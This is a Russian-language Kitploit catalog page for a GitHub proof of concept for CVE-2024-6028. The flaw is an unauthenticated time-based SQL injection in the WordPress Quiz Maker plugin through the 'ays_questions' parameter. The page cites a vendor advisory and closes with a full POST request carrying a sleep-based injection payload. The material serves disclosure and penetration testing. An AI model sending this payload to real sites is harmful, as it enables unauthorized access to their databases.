Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6028-Poc — CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Неавторизованная SQL-инъекция через параметр 'ays_questions' | Kitploit
Инструменты/GitHubGitHub/gmh5225/cve-2024-6028-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubgmh5225/cve-2024-6028-poc

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Неавторизованная SQL-инъекция через параметр 'ays_questions'

Репозиторий
572 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - SQL-инъекция без аутентификации через параметр 'ays_questions'

Описание

Плагин Quiz Maker для WordPress подвержен time-based SQL-инъекции через параметр 'ays_questions' во всех версиях до 6.5.8.3 включительно из-за недостаточного экранирования пользовательского параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие, что может быть использовано для извлечения конфиденциальной информации из базы данных.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

Файл: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

Класс: Quiz_Maker_Public

Рабочий процесс: метод ays_finish_quiz -> метод get_questions_categories image image image

Poc

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

image

Скачать инструмент